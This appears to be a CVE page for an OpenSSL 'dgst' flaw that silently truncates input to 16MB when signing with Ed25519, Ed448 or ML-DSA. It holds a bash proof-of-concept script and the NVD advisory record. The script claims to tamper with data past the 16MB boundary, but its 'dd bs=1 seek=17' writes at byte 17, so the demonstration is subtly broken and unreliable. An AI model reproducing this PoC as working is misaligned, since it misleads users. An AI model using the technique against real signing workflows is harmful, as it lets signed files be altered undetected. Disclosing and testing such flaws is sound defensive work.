CVE-2025-15469

#!/bin/bash # CVE-2025-15469 PoC - OpenSSL dgst 16MB Input Truncation # This PoC demonstrates that files larger than 16MB can be modified # without detection when signed and verified with affected openssl dgst # Create a test file larger than 16MB dd if=/dev/urandom of=test_file.bin bs=1M count=20 2>/dev/null # Generate Ed25519 keypair openssl genpkey -algorithm Ed25519 -out private_key.pem 2>/dev/null openssl pkey -in private_key.pem -pubout -out public_key.pem 2>/dev/null # Sign the file (openssl dgst will silently truncate to 16MB) echo "Signing file with Ed25519 (file is 20MB, will be truncated to 16MB)..." openssl dgst -sha512 -sign private_key.pem -out signature.bin test_file.bin # Modify the file beyond 16MB boundary echo "Modifying data beyond 16MB boundary..." echo "MODIFIED_DATA" | dd of=test_file.bin bs=1 seek=17 conv=notrunc 2>/dev/null # Verify signature (will incorrectly report success) echo "Verifying modified file..." openssl dgst -sha512 -verify public_key.pem -signature signature.bin test_file.bin # Cleanup rm -f test_file.bin private_key.pem public_key.pem signature.bin echo "" echo "Expected behavior: Verification should FAIL but may show SUCCESS due to truncation vulnerability"

{"cve": {"id": "CVE-2025-15469", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:14.523", "lastModified": "2026-02-02T18:37:39.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: The 'openssl dgst' command-line tool silently truncates input\ndata to 16MB when using one-shot signing algorithms and reports success instead\nof an error.\n\nImpact summary: A user signing or verifying files larger than 16MB with\none-shot algorithms (such as Ed25519, Ed448, or ML-DSA) may believe the entire\nfile is authenticated while trailing data beyond 16MB remains unauthenticated.\n\nWhen the 'openssl dgst' command is used with algorithms that only support\none-shot signing (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), the input\nis buffered with a 16MB limit. If the input exceeds this limit, the tool\nsilently truncates to the first 16MB and continues without signaling an error,\ncontrary to what the documentation states. This creates an integrity gap where\ntrailing bytes can be modified without detection if both signing and\nverification are performed using the same affected codepath.\n\nThe issue affects only the command-line tool behavior. Verifiers that process\nthe full message using library APIs will reject the signature, so the risk\nprimarily affects workflows that both sign and verify with the affected\n'openssl dgst' command. Streaming digest algorithms for 'openssl dgst' and\nlibrary users are unaffected.\n\nThe FIPS modules in 3.5 and 3.6 are not affected by this issue, as the\ncommand-line tools are outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.5 and 3.6 are vulnerable to this issue.\n\nOpenSSL 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are not affected by this issue."}, {"lang": "es", "value": "Resumen del problema: La herramienta de línea de comandos 'openssl dgst' trunca silenciosamente los datos de entrada a 16MB cuando se utilizan algoritmos de firma de un solo paso e informa éxito en lugar de un error.\n\nResumen del impacto: Un usuario que firma o verifica archivos de más de 16MB con algoritmos de un solo paso (como Ed25519, Ed448 o ML-DSA) puede creer que el archivo completo está autenticado mientras que los datos finales más allá de 16MB permanecen sin autenticar.\n\nCuando se utiliza el comando 'openssl dgst' con algoritmos que solo admiten la firma de un solo paso (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), la entrada se almacena en búfer con un límite de 16MB. Si la entrada excede este límite, la herramienta trunca silenciosamente a los primeros 16MB y continúa sin señalar un error, contrario a lo que establece la documentación. Esto crea una brecha de integridad donde los bytes finales pueden modificarse sin detección si tanto la firma como la verificación se realizan utilizando la misma ruta de código afectada.\n\nEl problema afecta solo el comportamiento de la herramienta de línea de comandos. Los verificadores que procesan el mensaje completo utilizando las API de la librería rechazarán la firma, por lo que el riesgo afecta principalmente a los flujos de trabajo que tanto firman como verifican con el comando 'openssl dgst' afectado. Los algoritmos de resumen por streaming para 'openssl dgst' y los usuarios de la librería no se ven afectados.\n\nLos módulos FIPS en 3.5 y 3.6 no se ven afectados por este problema, ya que las herramientas de línea de comandos están fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.5 y 3.6 son vulnerables a este problema.\n\nOpenSSL 3.4, 3.3, 3.0, 1.1.1 y 1.0.2 no se ven afectados por este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.5", "matchCriteriaId": "1CAC7CBE-EC03-4089-938A-0CEEB2E09B62"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0", "versionEndExcluding": "3.6.1", "matchCriteriaId": "68352537-5E99-4F4D-B78A-BCF0353A70A5"}]}]}], "references": [{"url": "https://github.com/openssl/openssl/commit/310f305eb92ea8040d6b3cb75a5feeba8e6acf2f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openssl/openssl/commit/a7936fa4bd23c906e1955a16 ... (truncated)